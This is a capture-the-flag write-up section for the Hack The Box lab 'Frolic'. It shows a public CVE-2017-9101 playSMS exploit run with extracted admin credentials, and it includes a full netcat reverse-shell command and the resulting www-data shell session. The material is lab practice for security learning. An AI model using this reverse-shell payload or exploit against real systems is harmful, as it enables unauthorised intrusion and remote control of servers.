Remote Code Execution
A playSMS instance is confirmed to be present in the /playsms directory on the target Web server on the port 9999. Additionally, a working credential has been extracted after a lengthy de-obfuscation. While I have yet to confirm the version information of the instance, [[Frolic_CVE-2017-9101#[Exploit](https //github.com/jasperla/CVE-2017-9101)|one of more common exploits]] will be conducted here in hope to invoke code execution on the target system
┌──(kali㉿kali)-[~/archive/htb/labs/frolic]
└─$ python3 cve-2017-9101.py --username admin --password idkwhatispass --url http://$IP:9999/playsms --command 'mkfifo /tmp/vdma; nc 10.10.16.8 9999 0</tmp/vdma | /bin/sh >/tmp/vdma 2>&1; rm /tmp/vdma'
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
[*] Attempting to execute payloadExecuting the exploit
┌──(kali㉿kali)-[~/…/htb/labs/frolic/obfuscated]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.111] 52360
whoami
www-data
hostname
frolic
ifconfig
ens33 link encap:Ethernet HWaddr 00:50:56:b9:eb:ab
inet addr:10.10.10.111 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb9:ebab/64 Scope:Link
inet6 addr: dead:beef::250:56ff:feb9:ebab/64 Scope:Global
up broadcast running multicast mtu:1500 Metric:1
rx packets:1231109 errors:354 dropped:1118 overruns:0 frame:0
tx packets:1222287 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:194103450 (194.1 MB) TX bytes:413532074 (413.5 MB)
interrupt:19 Base address:0x2000
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:65536 Metric:1
rx packets:53092 errors:0 dropped:0 overruns:0 frame:0
tx packets:53092 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
rx bytes:3929104 (3.9 MB) TX bytes:3929104 (3.9 MB)Initial Foothold established to the target system as the www-data user via exploiting CVE-2017-9101